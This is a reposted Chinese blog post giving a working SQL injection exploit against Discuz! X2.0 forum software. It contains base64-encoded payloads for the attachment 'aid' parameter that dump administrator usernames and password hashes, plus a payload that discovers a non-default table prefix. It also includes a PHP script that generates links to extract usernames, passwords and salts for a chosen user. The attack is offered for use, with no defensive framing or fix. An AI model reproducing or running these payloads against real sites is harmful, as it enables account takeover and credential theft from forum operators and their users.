DZ2.0直接暴管理账号密码(默认前缀的情况下)
/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V
sZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd
29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGl
rZSAnYWRtaW58eHx5%3D
base64解码
1′ and 1=2 union all select 1,group_concat(username,0x7C3274747C,password)
from pre_common_member where username like ‘admin|x|y
如果不是默认前缀
暴前缀EXP
/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V
sZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMR
VMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1
FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D
———————–
再贴个PHP的EXP
<?php
$host=”http://X2.0论坛地址”;
$affuser=”要爆的用户名username”;
echo ‘<a href=”‘;
echo $host.”forum.php?mod=attachment&findpost=ss&aid=”;
echo urlencode(base64_encode(“1′ and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=database() and TABLE_NAME like ‘%_member|x|y”));
echo ‘” target=”_blank”>爆前缀</a>’;
echo “</br>”;
echo ‘<a href=”‘;
echo $host.”forum.php?mod=attachment&findpost=ss&aid=”;
echo urlencode(base64_encode(“1′ and 1=2 union all select 1,group_concat(username,0x7C,password,0x7C,salt) from pre_ucenter_members where username like ‘$affuser|x|y”));
echo ‘” target=”_blank”>爆password,salt</a>’;
?>
本文转自enables 51CTO博客,原文链接:http://blog.51cto.com/niuzu/599557,如需转载请自行联系原作者
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
